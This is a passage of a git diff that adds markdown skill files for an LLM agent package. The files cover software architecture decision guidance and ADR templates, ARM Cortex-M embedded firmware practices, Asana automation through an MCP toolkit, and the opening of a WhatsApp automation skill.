│ │ └─ NO → Consider simpler ORM direct access
|
||||
│ └─ LOW (simple CRUD, single database)
|
||||
│ → ORM directly (Prisma, Drizzle)
|
||||
│ Simpler = Better, Faster
|
||||
│
|
||||
├─ Business Rules Complexity?
|
||||
│ ├─ HIGH (domain logic, rules vary by context)
|
||||
│ │ → Domain-Driven Design
|
||||
│ │ VALIDATE: Do you have domain experts on team?
|
||||
│ │ ├─ YES → Full DDD (Aggregates, Value Objects)
|
||||
│ │ └─ NO → Partial DDD (rich entities, clear boundaries)
|
||||
│ └─ LOW (mostly CRUD, simple validation)
|
||||
│ → Transaction Script pattern
|
||||
│ Simpler = Better, Faster
|
||||
│
|
||||
├─ Independent Scaling Needed?
|
||||
│ ├─ YES (different components scale differently)
|
||||
│ │ → Microservices WORTH the complexity
|
||||
│ │ REQUIREMENTS (ALL must be true):
|
||||
│ │ - Clear domain boundaries
|
||||
│ │ - Team > 10 developers
|
||||
│ │ - Different scaling needs per service
|
||||
│ │ IF NOT ALL MET → Modular Monolith instead
|
||||
│ └─ NO (everything scales together)
|
||||
│ → Modular Monolith
|
||||
│ Can extract services later when proven needed
|
||||
│
|
||||
└─ Real-time Requirements?
|
||||
├─ HIGH (immediate updates, multi-user sync)
|
||||
│ → Event-Driven Architecture
|
||||
│ → Message Queue (RabbitMQ, Redis, Kafka)
|
||||
│ VALIDATE: Can you handle eventual consistency?
|
||||
│ ├─ YES → Event-driven valid
|
||||
│ └─ NO → Synchronous with polling
|
||||
└─ LOW (eventual consistency acceptable)
|
||||
→ Synchronous (REST/GraphQL)
|
||||
Simpler = Better, Faster
|
||||
```
|
||||
|
||||
## The 3 Questions (Before ANY Pattern)
|
||||
|
||||
1. **Problem Solved**: What SPECIFIC problem does this pattern solve?
|
||||
2. **Simpler Alternative**: Is there a simpler solution?
|
||||
3. **Deferred Complexity**: Can we add this LATER when needed?
|
||||
|
||||
## Red Flags (Anti-patterns)
|
||||
|
||||
| Pattern | Anti-pattern | Simpler Alternative |
|
||||
|---------|-------------|-------------------|
|
||||
| Microservices | Premature splitting | Start monolith, extract later |
|
||||
| Clean/Hexagonal | Over-abstraction | Concrete first, interfaces later |
|
||||
| Event Sourcing | Over-engineering | Append-only audit log |
|
||||
| CQRS | Unnecessary complexity | Single model |
|
||||
| Repository | YAGNI for simple CRUD | ORM direct access |
|
||||
50
packages/llm/skills/architecture/patterns-reference.md
Normal file
50
packages/llm/skills/architecture/patterns-reference.md
Normal file
@ -0,0 +1,50 @@
|
||||
# Architecture Patterns Reference
|
||||
|
||||
> Quick reference for common patterns with usage guidance.
|
||||
|
||||
## Data Access Patterns
|
||||
|
||||
| Pattern | When to Use | When NOT to Use | Complexity |
|
||||
|---------|-------------|-----------------|------------|
|
||||
| **Active Record** | Simple CRUD, rapid prototyping | Complex queries, multiple sources | Low |
|
||||
| **Repository** | Testing needed, multiple sources | Simple CRUD, single database | Medium |
|
||||
| **Unit of Work** | Complex transactions | Simple operations | High |
|
||||
| **Data Mapper** | Complex domain, performance | Simple CRUD, rapid dev | High |
|
||||
|
||||
## Domain Logic Patterns
|
||||
|
||||
| Pattern | When to Use | When NOT to Use | Complexity |
|
||||
|---------|-------------|-----------------|------------|
|
||||
| **Transaction Script** | Simple CRUD, procedural | Complex business rules | Low |
|
||||
| **Table Module** | Record-based logic | Rich behavior needed | Low |
|
||||
| **Domain Model** | Complex business logic | Simple CRUD | Medium |
|
||||
| **DDD (Full)** | Complex domain, domain experts | Simple domain, no experts | High |
|
||||
|
||||
## Distributed System Patterns
|
||||
|
||||
| Pattern | When to Use | When NOT to Use | Complexity |
|
||||
|---------|-------------|-----------------|------------|
|
||||
| **Modular Monolith** | Small teams, unclear boundaries | Clear contexts, different scales | Medium |
|
||||
| **Microservices** | Different scales, large teams | Small teams, simple domain | Very High |
|
||||
| **Event-Driven** | Real-time, loose coupling | Simple workflows, strong consistency | High |
|
||||
| **CQRS** | Read/write performance diverges | Simple CRUD, same model | High |
|
||||
| **Saga** | Distributed transactions | Single database, simple ACID | High |
|
||||
|
||||
## API Patterns
|
||||
|
||||
| Pattern | When to Use | When NOT to Use | Complexity |
|
||||
|---------|-------------|-----------------|------------|
|
||||
| **REST** | Standard CRUD, resources | Real-time, complex queries | Low |
|
||||
| **GraphQL** | Flexible queries, multiple clients | Simple CRUD, caching needs | Medium |
|
||||
| **gRPC** | Internal services, performance | Public APIs, browser clients | Medium |
|
||||
| **WebSocket** | Real-time updates | Simple request/response | Medium |
|
||||
|
||||
---
|
||||
|
||||
## Simplicity Principle
|
||||
|
||||
**"Start simple, add complexity only when proven necessary."**
|
||||
|
||||
- You can always add patterns later
|
||||
- Removing complexity is MUCH harder than adding it
|
||||
- When in doubt, choose simpler option
|
||||
77
packages/llm/skills/architecture/trade-off-analysis.md
Normal file
77
packages/llm/skills/architecture/trade-off-analysis.md
Normal file
@ -0,0 +1,77 @@
|
||||
# Trade-off Analysis & ADR
|
||||
|
||||
> Document every architectural decision with trade-offs.
|
||||
|
||||
## Decision Framework
|
||||
|
||||
For EACH architectural component, document:
|
||||
|
||||
```markdown
|
||||
## Architecture Decision Record
|
||||
|
||||
### Context
|
||||
- **Problem**: [What problem are we solving?]
|
||||
- **Constraints**: [Team size, scale, timeline, budget]
|
||||
|
||||
### Options Considered
|
||||
|
||||
| Option | Pros | Cons | Complexity | When Valid |
|
||||
|--------|------|------|------------|-----------|
|
||||
| Option A | Benefit 1 | Cost 1 | Low | [Conditions] |
|
||||
| Option B | Benefit 2 | Cost 2 | High | [Conditions] |
|
||||
|
||||
### Decision
|
||||
**Chosen**: [Option B]
|
||||
|
||||
### Rationale
|
||||
1. [Reason 1 - tied to constraints]
|
||||
2. [Reason 2 - tied to requirements]
|
||||
|
||||
### Trade-offs Accepted
|
||||
- [What we're giving up]
|
||||
- [Why this is acceptable]
|
||||
|
||||
### Consequences
|
||||
- **Positive**: [Benefits we gain]
|
||||
- **Negative**: [Costs/risks we accept]
|
||||
- **Mitigation**: [How we'll address negatives]
|
||||
|
||||
### Revisit Trigger
|
||||
- [When to reconsider this decision]
|
||||
```
|
||||
|
||||
## ADR Template
|
||||
|
||||
```markdown
|
||||
# ADR-[XXX]: [Decision Title]
|
||||
|
||||
## Status
|
||||
Proposed | Accepted | Deprecated | Superseded by [ADR-YYY]
|
||||
|
||||
## Context
|
||||
[What problem? What constraints?]
|
||||
|
||||
## Decision
|
||||
[What we chose - be specific]
|
||||
|
||||
## Rationale
|
||||
[Why - tie to requirements and constraints]
|
||||
|
||||
## Trade-offs
|
||||
[What we're giving up - be honest]
|
||||
|
||||
## Consequences
|
||||
- **Positive**: [Benefits]
|
||||
- **Negative**: [Costs]
|
||||
- **Mitigation**: [How to address]
|
||||
```
|
||||
|
||||
## ADR Storage
|
||||
|
||||
```
|
||||
docs/
|
||||
└── architecture/
|
||||
├── adr-001-use-nextjs.md
|
||||
├── adr-002-postgresql-over-mongodb.md
|
||||
└── adr-003-adopt-repository-pattern.md
|
||||
```
|
||||
302
packages/llm/skills/arm-cortex-expert/SKILL.md
Normal file
302
packages/llm/skills/arm-cortex-expert/SKILL.md
Normal file
@ -0,0 +1,302 @@
|
||||
---
|
||||
name: arm-cortex-expert
|
||||
description: Senior embedded software engineer specializing in firmware and driver development for ARM Cortex-M microcontrollers (Teensy, STM32, nRF52, SAMD).
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# @arm-cortex-expert
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Working on @arm-cortex-expert tasks or workflows
|
||||
- Needing guidance, best practices, or checklists for @arm-cortex-expert
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- The task is unrelated to @arm-cortex-expert
|
||||
- You need a different domain or tool outside this scope
|
||||
|
||||
## Instructions
|
||||
|
||||
- Clarify goals, constraints, and required inputs.
|
||||
- Apply relevant best practices and validate outcomes.
|
||||
- Provide actionable steps and verification.
|
||||
- If detailed examples are required, open `resources/implementation-playbook.md`.
|
||||
|
||||
## 🎯 Role & Objectives
|
||||
|
||||
- Deliver **complete, compilable firmware and driver modules** for ARM Cortex-M platforms.
|
||||
- Implement **peripheral drivers** (I²C/SPI/UART/ADC/DAC/PWM/USB) with clean abstractions using HAL, bare-metal registers, or platform-specific libraries.
|
||||
- Provide **software architecture guidance**: layering, HAL patterns, interrupt safety, memory management.
|
||||
- Show **robust concurrency patterns**: ISRs, ring buffers, event queues, cooperative scheduling, FreeRTOS/Zephyr integration.
|
||||
- Optimize for **performance and determinism**: DMA transfers, cache effects, timing constraints, memory barriers.
|
||||
- Focus on **software maintainability**: code comments, unit-testable modules, modular driver design.
|
||||
|
||||
---
|
||||
|
||||
## 🧠 Knowledge Base
|
||||
|
||||
**Target Platforms**
|
||||
|
||||
- **Teensy 4.x** (i.MX RT1062, Cortex-M7 600 MHz, tightly coupled memory, caches, DMA)
|
||||
- **STM32** (F4/F7/H7 series, Cortex-M4/M7, HAL/LL drivers, STM32CubeMX)
|
||||
- **nRF52** (Nordic Semiconductor, Cortex-M4, BLE, nRF SDK/Zephyr)
|
||||
- **SAMD** (Microchip/Atmel, Cortex-M0+/M4, Arduino/bare-metal)
|
||||
|
||||
**Core Competencies**
|
||||
|
||||
- Writing register-level drivers for I²C, SPI, UART, CAN, SDIO
|
||||
- Interrupt-driven data pipelines and non-blocking APIs
|
||||
- DMA usage for high-throughput (ADC, SPI, audio, UART)
|
||||
- Implementing protocol stacks (BLE, USB CDC/MSC/HID, MIDI)
|
||||
- Peripheral abstraction layers and modular codebases
|
||||
- Platform-specific integration (Teensyduino, STM32 HAL, nRF SDK, Arduino SAMD)
|
||||
|
||||
**Advanced Topics**
|
||||
|
||||
- Cooperative vs. preemptive scheduling (FreeRTOS, Zephyr, bare-metal schedulers)
|
||||
- Memory safety: avoiding race conditions, cache line alignment, stack/heap balance
|
||||
- ARM Cortex-M7 memory barriers for MMIO and DMA/cache coherency
|
||||
- Efficient C++17/Rust patterns for embedded (templates, constexpr, zero-cost abstractions)
|
||||
- Cross-MCU messaging over SPI/I²C/USB/BLE
|
||||
|
||||
---
|
||||
|
||||
## ⚙️ Operating Principles
|
||||
|
||||
- **Safety Over Performance:** correctness first; optimize after profiling
|
||||
- **Full Solutions:** complete drivers with init, ISR, example usage — not snippets
|
||||
- **Explain Internals:** annotate register usage, buffer structures, ISR flows
|
||||
- **Safe Defaults:** guard against buffer overruns, blocking calls, priority inversions, missing barriers
|
||||
- **Document Tradeoffs:** blocking vs async, RAM vs flash, throughput vs CPU load
|
||||
|
||||
---
|
||||
|
||||
## 🛡️ Safety-Critical Patterns for ARM Cortex-M7 (Teensy 4.x, STM32 F7/H7)
|
||||
|
||||
### Memory Barriers for MMIO (ARM Cortex-M7 Weakly-Ordered Memory)
|
||||
|
||||
**CRITICAL:** ARM Cortex-M7 has weakly-ordered memory. The CPU and hardware can reorder register reads/writes relative to other operations.
|
||||
|
||||
**Symptoms of Missing Barriers:**
|
||||
|
||||
- "Works with debug prints, fails without them" (print adds implicit delay)
|
||||
- Register writes don't take effect before next instruction executes
|
||||
- Reading stale register values despite hardware updates
|
||||
- Intermittent failures that disappear with optimization level changes
|
||||
|
||||
#### Implementation Pattern
|
||||
|
||||
**C/C++:** Wrap register access with `__DMB()` (data memory barrier) before/after reads, `__DSB()` (data synchronization barrier) after writes. Create helper functions: `mmio_read()`, `mmio_write()`, `mmio_modify()`.
|
||||
|
||||
**Rust:** Use `cortex_m::asm::dmb()` and `cortex_m::asm::dsb()` around volatile reads/writes. Create macros like `safe_read_reg!()`, `safe_write_reg!()`, `safe_modify_reg!()` that wrap HAL register access.
|
||||
|
||||
**Why This Matters:** M7 reorders memory operations for performance. Without barriers, register writes may not complete before next instruction, or reads return stale cached values.
|
||||
|
||||
### DMA and Cache Coherency
|
||||
|
||||
**CRITICAL:** ARM Cortex-M7 devices (Teensy 4.x, STM32 F7/H7) have data caches. DMA and CPU can see different data without cache maintenance.
|
||||
|
||||
**Alignment Requirements (CRITICAL):**
|
||||
|
||||
- All DMA buffers: **32-byte aligned** (ARM Cortex-M7 cache line size)
|
||||
- Buffer size: **multiple of 32 bytes**
|
||||
- Violating alignment corrupts adjacent memory during cache invalidate
|
||||
|
||||
**Memory Placement Strategies (Best to Worst):**
|
||||
|
||||
1. **DTCM/SRAM** (Non-cacheable, fastest CPU access)
|
||||
- C++: `__attribute__((section(".dtcm.bss"))) __attribute__((aligned(32))) static uint8_t buffer[512];`
|
||||
- Rust: `#[link_section = ".dtcm"] #[repr(C, align(32))] static mut BUFFER: [u8; 512] = [0; 512];`
|
||||
|
||||
2. **MPU-configured Non-cacheable regions** - Configure OCRAM/SRAM regions as non-cacheable via MPU
|
||||
|
||||
3. **Cache Maintenance** (Last resort - slowest)
|
||||
- Before DMA reads from memory: `arm_dcache_flush_delete()` or `cortex_m::cache::clean_dcache_by_range()`
|
||||
- After DMA writes to memory: `arm_dcache_delete()` or `cortex_m::cache::invalidate_dcache_by_range()`
|
||||
|
||||
### Address Validation Helper (Debug Builds)
|
||||
|
||||
**Best practice:** Validate MMIO addresses in debug builds using `is_valid_mmio_address(addr)` checking addr is within valid peripheral ranges (e.g., 0x40000000-0x4FFFFFFF for peripherals, 0xE0000000-0xE00FFFFF for ARM Cortex-M system peripherals). Use `#ifdef DEBUG` guards and halt on invalid addresses.
|
||||
|
||||
### Write-1-to-Clear (W1C) Register Pattern
|
||||
|
||||
Many status registers (especially i.MX RT, STM32) clear by writing 1, not 0:
|
||||
|
||||
```cpp
|
||||
uint32_t status = mmio_read(&USB1_USBSTS);
|
||||
mmio_write(&USB1_USBSTS, status); // Write bits back to clear them
|
||||
```
|
||||
|
||||
**Common W1C:** `USBSTS`, `PORTSC`, CCM status. **Wrong:** `status &= ~bit` does nothing on W1C registers.
|
||||
|
||||
### Platform Safety & Gotchas
|
||||
|
||||
**⚠️ Voltage Tolerances:**
|
||||
|
||||
- Most platforms: GPIO max 3.3V (NOT 5V tolerant except STM32 FT pins)
|
||||
- Use level shifters for 5V interfaces
|
||||
- Check datasheet current limits (typically 6-25mA)
|
||||
|
||||
**Teensy 4.x:** FlexSPI dedicated to Flash/PSRAM only • EEPROM emulated (limit writes <10Hz) • LPSPI max 30MHz • Never change CCM clocks while peripherals active
|
||||
|
||||
**STM32 F7/H7:** Clock domain config per peripheral • Fixed DMA stream/channel assignments • GPIO speed affects slew rate/power
|
||||
|
||||
**nRF52:** SAADC needs calibration after power-on • GPIOTE limited (8 channels) • Radio shares priority levels
|
||||
|
||||
**SAMD:** SERCOM needs careful pin muxing • GCLK routing critical • Limited DMA on M0+ variants
|
||||
|
||||
### Modern Rust: Never Use `static mut`
|
||||
|
||||
**CORRECT Patterns:**
|
||||
|
||||
```rust
|
||||
static READY: AtomicBool = AtomicBool::new(false);
|
||||
static STATE: Mutex<RefCell<Option<T>>> = Mutex::new(RefCell::new(None));
|
||||
// Access: critical_section::with(|cs| STATE.borrow_ref_mut(cs))
|
||||
```
|
||||
|
||||
**WRONG:** `static mut` is undefined behavior (data races).
|
||||
|
||||
**Atomic Ordering:** `Relaxed` (CPU-only) • `Acquire/Release` (shared state) • `AcqRel` (CAS) • `SeqCst` (rarely needed)
|
||||
|
||||
---
|
||||
|
||||
## 🎯 Interrupt Priorities & NVIC Configuration
|
||||
|
||||
**Platform-Specific Priority Levels:**
|
||||
|
||||
- **M0/M0+**: 2-4 priority levels (limited)
|
||||
- **M3/M4/M7**: 8-256 priority levels (configurable)
|
||||
|
||||
**Key Principles:**
|
||||
|
||||
- **Lower number = higher priority** (e.g., priority 0 preempts priority 1)
|
||||
- **ISRs at same priority level cannot preempt each other**
|
||||
- Priority grouping: preemption priority vs sub-priority (M3/M4/M7)
|
||||
- Reserve highest priorities (0-2) for time-critical operations (DMA, timers)
|
||||
- Use middle priorities (3-7) for normal peripherals (UART, SPI, I2C)
|
||||
- Use lowest priorities (8+) for background tasks
|
||||
|
||||
**Configuration:**
|
||||
|
||||
- C/C++: `NVIC_SetPriority(IRQn, priority)` or `HAL_NVIC_SetPriority()`
|
||||
- Rust: `NVIC::set_priority()` or use PAC-specific functions
|
||||
|
||||
---
|
||||
|
||||
## 🔒 Critical Sections & Interrupt Masking
|
||||
|
||||
**Purpose:** Protect shared data from concurrent access by ISRs and main code.
|
||||
|
||||
**C/C++:**
|
||||
|
||||
```cpp
|
||||
__disable_irq(); /* critical section */ __enable_irq(); // Blocks all
|
||||
|
||||
// M3/M4/M7: Mask only lower-priority interrupts
|
||||
uint32_t basepri = __get_BASEPRI();
|
||||
__set_BASEPRI(priority_threshold << (8 - __NVIC_PRIO_BITS));
|
||||
/* critical section */
|
||||
__set_BASEPRI(basepri);
|
||||
```
|
||||
|
||||
**Rust:** `cortex_m::interrupt::free(|cs| { /* use cs token */ })`
|
||||
|
||||
**Best Practices:**
|
||||
|
||||
- **Keep critical sections SHORT** (microseconds, not milliseconds)
|
||||
- Prefer BASEPRI over PRIMASK when possible (allows high-priority ISRs to run)
|
||||
- Use atomic operations when feasible instead of disabling interrupts
|
||||
- Document critical section rationale in comments
|
||||
|
||||
---
|
||||
|
||||
## 🐛 Hardfault Debugging Basics
|
||||
|
||||
**Common Causes:**
|
||||
|
||||
- Unaligned memory access (especially on M0/M0+)
|
||||
- Null pointer dereference
|
||||
- Stack overflow (SP corrupted or overflows into heap/data)
|
||||
- Illegal instruction or executing data as code
|
||||
- Writing to read-only memory or invalid peripheral addresses
|
||||
|
||||
**Inspection Pattern (M3/M4/M7):**
|
||||
|
||||
- Check `HFSR` (HardFault Status Register) for fault type
|
||||
- Check `CFSR` (Configurable Fault Status Register) for detailed cause
|
||||
- Check `MMFAR` / `BFAR` for faulting address (if valid)
|
||||
- Inspect stack frame: `R0-R3, R12, LR, PC, xPSR`
|
||||
|
||||
**Platform Limitations:**
|
||||
|
||||
- **M0/M0+**: Limited fault information (no CFSR, MMFAR, BFAR)
|
||||
- **M3/M4/M7**: Full fault registers available
|
||||
|
||||
**Debug Tip:** Use hardfault handler to capture stack frame and print/log registers before reset.
|
||||
|
||||
---
|
||||
|
||||
## 📊 Cortex-M Architecture Differences
|
||||
|
||||
| Feature | M0/M0+ | M3 | M4/M4F | M7/M7F |
|
||||
| ------------------ | ------------------------ | -------- | --------------------- | -------------------- |
|
||||
| **Max Clock** | ~50 MHz | ~100 MHz | ~180 MHz | ~600 MHz |
|
||||
| **ISA** | Thumb-1 only | Thumb-2 | Thumb-2 + DSP | Thumb-2 + DSP |
|
||||
| **MPU** | M0+ optional | Optional | Optional | Optional |
|
||||
| **FPU** | No | No | M4F: single precision | M7F: single + double |
|
||||
| **Cache** | No | No | No | I-cache + D-cache |
|
||||
| **TCM** | No | No | No | ITCM + DTCM |
|
||||
| **DWT** | No | Yes | Yes | Yes |
|
||||
| **Fault Handling** | Limited (HardFault only) | Full | Full | Full |
|
||||
|
||||
---
|
||||
|
||||
## 🧮 FPU Context Saving
|
||||
|
||||
**Lazy Stacking (Default on M4F/M7F):** FPU context (S0-S15, FPSCR) saved only if ISR uses FPU. Reduces latency for non-FPU ISRs but creates variable timing.
|
||||
|
||||
**Disable for deterministic latency:** Configure `FPU->FPCCR` (clear LSPEN bit) in hard real-time systems or when ISRs always use FPU.
|
||||
|
||||
---
|
||||
|
||||
## 🛡️ Stack Overflow Protection
|
||||
|
||||
**MPU Guard Pages (Best):** Configure no-access MPU region below stack. Triggers MemManage fault on M3/M4/M7. Limited on M0/M0+.
|
||||
|
||||
**Canary Values (Portable):** Magic value (e.g., `0xDEADBEEF`) at stack bottom, check periodically.
|
||||
|
||||
**Watchdog:** Indirect detection via timeout, provides recovery. **Best:** MPU guard pages, else canary + watchdog.
|
||||
|
||||
---
|
||||
|
||||
## 🔄 Workflow
|
||||
|
||||
1. **Clarify Requirements** → target platform, peripheral type, protocol details (speed, mode, packet size)
|
||||
2. **Design Driver Skeleton** → constants, structs, compile-time config
|
||||
3. **Implement Core** → init(), ISR handlers, buffer logic, user-facing API
|
||||
4. **Validate** → example usage + notes on timing, latency, throughput
|
||||
5. **Optimize** → suggest DMA, interrupt priorities, or RTOS tasks if needed
|
||||
6. **Iterate** → refine with improved versions as hardware interaction feedback is provided
|
||||
|
||||
---
|
||||
|
||||
## 🛠 Example: SPI Driver for External Sensor
|
||||
|
||||
**Pattern:** Create non-blocking SPI drivers with transaction-based read/write:
|
||||
|
||||
- Configure SPI (clock speed, mode, bit order)
|
||||
- Use CS pin control with proper timing
|
||||
- Abstract register read/write operations
|
||||
- Example: `sensorReadRegister(0x0F)` for WHO_AM_I
|
||||
- For high throughput (>500 kHz), use DMA transfers
|
||||
|
||||
**Platform-specific APIs:**
|
||||
|
||||
- **Teensy 4.x**: `SPI.beginTransaction(SPISettings(speed, order, mode))` → `SPI.transfer(data)` → `SPI.endTransaction()`
|
||||
- **STM32**: `HAL_SPI_Transmit()` / `HAL_SPI_Receive()` or LL drivers
|
||||
- **nRF52**: `nrfx_spi_xfer()` or `nrf_drv_spi_transfer()`
|
||||
- **SAMD**: Configure SERCOM in SPI master mode with `SERCOM_SPI_MODE_MASTER`
|
||||
175
packages/llm/skills/asana-automation/SKILL.md
Normal file
175
packages/llm/skills/asana-automation/SKILL.md
Normal file
@ -0,0 +1,175 @@
|
||||
---
|
||||
name: asana-automation
|
||||
description: "Automate Asana tasks via Rube MCP (Composio): tasks, projects, sections, teams, workspaces. Always search tools first for current schemas."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Asana Automation via Rube MCP
|
||||
|
||||
Automate Asana operations through Composio's Asana toolkit via Rube MCP.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Rube MCP must be connected (RUBE_SEARCH_TOOLS available)
|
||||
- Active Asana connection via `RUBE_MANAGE_CONNECTIONS` with toolkit `asana`
|
||||
- Always call `RUBE_SEARCH_TOOLS` first to get current tool schemas
|
||||
|
||||
## Setup
|
||||
|
||||
**Get Rube MCP**: Add `https://rube.app/mcp` as an MCP server in your client configuration. No API keys needed — just add the endpoint and it works.
|
||||
|
||||
|
||||
1. Verify Rube MCP is available by confirming `RUBE_SEARCH_TOOLS` responds
|
||||
2. Call `RUBE_MANAGE_CONNECTIONS` with toolkit `asana`
|
||||
3. If connection is not ACTIVE, follow the returned auth link to complete Asana OAuth
|
||||
4. Confirm connection status shows ACTIVE before running any workflows
|
||||
|
||||
## Core Workflows
|
||||
|
||||
### 1. Manage Tasks
|
||||
|
||||
**When to use**: User wants to create, search, list, or organize tasks
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ASANA_GET_MULTIPLE_WORKSPACES` - Get workspace ID [Prerequisite]
|
||||
2. `ASANA_SEARCH_TASKS_IN_WORKSPACE` - Search tasks [Optional]
|
||||
3. `ASANA_GET_TASKS_FROM_A_PROJECT` - List project tasks [Optional]
|
||||
4. `ASANA_CREATE_A_TASK` - Create a new task [Optional]
|
||||
5. `ASANA_GET_A_TASK` - Get task details [Optional]
|
||||
6. `ASANA_CREATE_SUBTASK` - Create a subtask [Optional]
|
||||
7. `ASANA_GET_TASK_SUBTASKS` - List subtasks [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `workspace`: Workspace GID (required for search/creation)
|
||||
- `projects`: Array of project GIDs to add task to
|
||||
- `name`: Task name
|
||||
- `notes`: Task description
|
||||
- `assignee`: Assignee (user GID or email)
|
||||
- `due_on`: Due date (YYYY-MM-DD)
|
||||
|
||||
**Pitfalls**:
|
||||
- Workspace GID is required for most operations; get it first
|
||||
- Task GIDs are returned as strings, not integers
|
||||
- Search is workspace-scoped, not project-scoped
|
||||
|
||||
### 2. Manage Projects and Sections
|
||||
|
||||
**When to use**: User wants to create projects, manage sections, or organize tasks
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ASANA_GET_WORKSPACE_PROJECTS` - List workspace projects [Optional]
|
||||
2. `ASANA_GET_A_PROJECT` - Get project details [Optional]
|
||||
3. `ASANA_CREATE_A_PROJECT` - Create a new project [Optional]
|
||||
4. `ASANA_GET_SECTIONS_IN_PROJECT` - List sections [Optional]
|
||||
5. `ASANA_CREATE_SECTION_IN_PROJECT` - Create a new section [Optional]
|
||||
6. `ASANA_ADD_TASK_TO_SECTION` - Move task to section [Optional]
|
||||
7. `ASANA_GET_TASKS_FROM_A_SECTION` - List tasks in section [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `project_gid`: Project GID
|
||||
- `name`: Project or section name
|
||||
- `workspace`: Workspace GID for creation
|
||||
- `task`: Task GID for section assignment
|
||||
- `section`: Section GID
|
||||
|
||||
**Pitfalls**:
|
||||
- Projects belong to workspaces; workspace GID is needed for creation
|
||||
- Sections are ordered within a project
|
||||
- DUPLICATE_PROJECT creates a copy with optional task inclusion
|
||||
|
||||
### 3. Manage Teams and Users
|
||||
|
||||
**When to use**: User wants to list teams, team members, or workspace users
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ASANA_GET_TEAMS_IN_WORKSPACE` - List workspace teams [Optional]
|
||||
2. `ASANA_GET_USERS_FOR_TEAM` - List team members [Optional]
|
||||
3. `ASANA_GET_USERS_FOR_WORKSPACE` - List all workspace users [Optional]
|
||||
4. `ASANA_GET_CURRENT_USER` - Get authenticated user [Optional]
|
||||
5. `ASANA_GET_MULTIPLE_USERS` - Get multiple user details [Optional]
|
||||
|
||||
**Key parameters**:
|
||||
- `workspace_gid`: Workspace GID
|
||||
- `team_gid`: Team GID
|
||||
|
||||
**Pitfalls**:
|
||||
- Users are workspace-scoped
|
||||
- Team membership requires the team GID
|
||||
|
||||
### 4. Parallel Operations
|
||||
|
||||
**When to use**: User needs to perform bulk operations efficiently
|
||||
|
||||
**Tool sequence**:
|
||||
1. `ASANA_SUBMIT_PARALLEL_REQUESTS` - Execute multiple API calls in parallel [Required]
|
||||
|
||||
**Key parameters**:
|
||||
- `actions`: Array of action objects with method, path, and data
|
||||
|
||||
**Pitfalls**:
|
||||
- Each action must be a valid Asana API call
|
||||
- Failed individual requests do not roll back successful ones
|
||||
|
||||
## Common Patterns
|
||||
|
||||
### ID Resolution
|
||||
|
||||
**Workspace name -> GID**:
|
||||
```
|
||||
1. Call ASANA_GET_MULTIPLE_WORKSPACES
|
||||
2. Find workspace by name
|
||||
3. Extract gid field
|
||||
```
|
||||
|
||||
**Project name -> GID**:
|
||||
```
|
||||
1. Call ASANA_GET_WORKSPACE_PROJECTS with workspace GID
|
||||
2. Find project by name
|
||||
3. Extract gid field
|
||||
```
|
||||
|
||||
### Pagination
|
||||
|
||||
- Asana uses cursor-based pagination with `offset` parameter
|
||||
- Check for `next_page` in response
|
||||
- Pass `offset` from `next_page.offset` for next request
|
||||
|
||||
## Known Pitfalls
|
||||
|
||||
**GID Format**:
|
||||
- All Asana IDs are strings (GIDs), not integers
|
||||
- GIDs are globally unique identifiers
|
||||
|
||||
**Workspace Scoping**:
|
||||
- Most operations require a workspace context
|
||||
- Tasks, projects, and users are workspace-scoped
|
||||
|
||||
## Quick Reference
|
||||
|
||||
| Task | Tool Slug | Key Params |
|
||||
|------|-----------|------------|
|
||||
| List workspaces | ASANA_GET_MULTIPLE_WORKSPACES | (none) |
|
||||
| Search tasks | ASANA_SEARCH_TASKS_IN_WORKSPACE | workspace, text |
|
||||
| Create task | ASANA_CREATE_A_TASK | workspace, name, projects |
|
||||
| Get task | ASANA_GET_A_TASK | task_gid |
|
||||
| Create subtask | ASANA_CREATE_SUBTASK | parent, name |
|
||||
| List subtasks | ASANA_GET_TASK_SUBTASKS | task_gid |
|
||||
| Project tasks | ASANA_GET_TASKS_FROM_A_PROJECT | project_gid |
|
||||
| List projects | ASANA_GET_WORKSPACE_PROJECTS | workspace |
|
||||
| Create project | ASANA_CREATE_A_PROJECT | workspace, name |
|
||||
| Get project | ASANA_GET_A_PROJECT | project_gid |
|
||||
| Duplicate project | ASANA_DUPLICATE_PROJECT | project_gid |
|
||||
| List sections | ASANA_GET_SECTIONS_IN_PROJECT | project_gid |
|
||||
| Create section | ASANA_CREATE_SECTION_IN_PROJECT | project_gid, name |
|
||||
| Add to section | ASANA_ADD_TASK_TO_SECTION | section, task |
|
||||
| Section tasks | ASANA_GET_TASKS_FROM_A_SECTION | section_gid |
|
||||
| List teams | ASANA_GET_TEAMS_IN_WORKSPACE | workspace_gid |
|
||||
| Team members | ASANA_GET_USERS_FOR_TEAM | team_gid |
|
||||
| Workspace users | ASANA_GET_USERS_FOR_WORKSPACE | workspace_gid |
|
||||
| Current user | ASANA_GET_CURRENT_USER | (none) |
|
||||
| Parallel requests | ASANA_SUBMIT_PARALLEL_REQUESTS | actions |
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
258
packages/llm/skills/automate-whatsapp/SKILL.md
Normal file
258
packages/llm/skills/automate-whatsapp/SKILL.md
Normal file
@ -0,0 +1,258 @@
|
||||
---
|
||||
name: automate-whatsapp
|
||||
description: "Build WhatsApp automations with Kapso workflows: configure WhatsApp triggers, edit workflow graphs, manage executions, deploy functions, and use databases/integrations for state. Use when automatin..."
|
||||
risk: safe
|
||||
source: "https://github.com/gokapso/agent-skills/tree/master/skills/automate-whatsapp"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Automate WhatsApp
|
||||
|
||||
## When to use
|
||||
|
||||
Use this skill to build and run WhatsApp automations: workflow CRUD, graph edits, triggers, executions, function management, app integrations, and D1 database operations.
|
||||
|
||||
## Setup
|
||||
|
||||
Env vars:
|
||||
- `KAPSO_API_BASE_URL` (host only, no `/platform/v1`)
|
||||
- `KAPSO_API_KEY`
|
||||
|
||||
## How to
|
||||
|
||||
### Edit a workflow graph
|
||||
|
||||
